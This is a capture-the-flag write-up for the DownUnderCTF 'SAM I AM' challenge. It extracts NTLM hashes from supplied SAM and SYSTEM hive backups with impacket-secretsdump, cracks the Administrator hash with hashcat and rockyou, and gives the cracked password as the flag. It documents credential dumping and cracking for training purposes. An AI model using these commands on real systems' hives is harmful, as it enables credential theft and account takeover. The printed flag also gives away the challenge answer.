DownUnderCTF : SAM I AM

Statement: The attacker managed to gain Domain Admin on our rebels Domain Controller! Looks like they managed to log on with an account using WMI and dumped some files.

Can you reproduce how they got the Administrator’s Password with the artifacts provided ?

Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}

The challenge provides the system.bak and sam.bak files. I therefore understand that I’ll need to recover the administrator password via these files.

To do this, I’m going to use Impacket’s secretsdump module :

# impacket-secretsdump -sam sam.bak -system system.bak LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0xa88f47504785ba029e8fa532c4c9e27b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:476b4dddbbffde29e739b618580adb1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

I’m going to get the NTLM hash of the administrator account to perform a bruteforce dictionary attack :

hashcat -a 0 -m 1000 "476b4dddbbffde29e739b618580adb1e" --wordlist /usr/share/wordlists/rockyou.txt

After 3s, the password is recovered :

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

476b4dddbbffde29e739b618580adb1e:!checkerboard1           
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 476b4dddbbffde29e739b618580adb1e
Time.Started.....: Fri Jul  5 15:47:41 2024 (3 secs)
Time.Estimated...: Fri Jul  5 15:47:44 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5164.2 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14340096/14344385 (99.97%)
Rejected.........: 0/14340096 (0.00%)
Restore.Point....: 14338048/14344385 (99.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !petey! -> !carragold!
Hardware.Mon.#1..: Util: 34%

Started: Fri Jul  5 15:47:41 2024
Stopped: Fri Jul  5 15:47:45 2024

Flag : DUCTF{!checkerboard1}